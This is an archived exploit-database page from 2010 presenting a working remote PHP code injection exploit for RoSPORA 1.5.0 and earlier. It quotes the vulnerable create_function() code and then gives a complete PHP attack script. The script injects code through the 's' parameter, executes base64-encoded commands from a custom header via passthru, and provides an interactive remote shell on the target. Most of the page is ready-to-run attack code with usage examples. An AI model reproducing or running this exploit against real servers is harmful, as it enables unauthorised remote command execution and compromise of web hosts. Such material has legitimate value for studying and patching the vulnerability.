[webapps / 0day] - RoSPORA <= 1.5.0 Remote PHP Code Injec
Posted on 28 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>RoSPORA <= 1.5.0 Remote PHP Code Injection | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='RoSPORA <= 1.5.0 Remote PHP Code Injection by EgiX in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>========================================== RoSPORA <= 1.5.0 Remote PHP Code Injection ========================================== <?php /* -------------------------------------------------- RoSPORA <= 1.5.0 Remote PHP Code Injection Exploit -------------------------------------------------- author...: EgiX mail.....: n0b0d13s[at]gmail[dot]com link.....: http://code.google.com/p/rospora/ This PoC was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. [-] vulnerable code in /index.php 667. if (!$sort = &$_GET['s']) $sort=0; 668. if (!$flag = &$_GET['f']) $flag=0; 669. if ($flag==0) { $flag=1; $sort_type='<'; } 670. else { $flag=0; $sort_type='>'; } 671. $link=$_SERVER['PHP_SELF']."?f=".$flag."&s="; 672. 673. if (!empty($pl_array)) 674. { 675. usort($pl_array, create_function('$a, $b', 'if ( $a['.$sort.'] == $b['.$sort.'] ) return 0; if ( $a['.$sort.'] '.$sort_type.' $b['.$sort.'] ) return -1; return 1;')); 676. } Input parameter passed through $_GET['s'] isn't properly sanitised before being used in a call to "create_function()" at line 675. This can be exploited to inject and execute arbitrary PHP code. */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die(" [-] No response from {$host}:80 "); fputs($sock, $packet); return stream_get_contents($sock); } print " +------------------------------------------------------------+"; print " | RoSPORA <= 1.5.0 Remote PHP Code Injection Exploit by EgiX |"; print " +------------------------------------------------------------+ "; if ($argc < 3) { print " Usage......: php $argv[0] host path "; print " Example....: php $argv[0] localhost /"; print " Example....: php $argv[0] localhost /rospora/ "; die(); } $host = $argv[1]; $path = $argv[2]; $code = "0]);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%%23"; $packet = "GET {$path}?s={$code} HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Cmd: %s "; $packet .= "Connection: close "; while(1) { print " rospora-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die(" [-] Exploit failed... "); } ?> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-28]</pre></body></html>
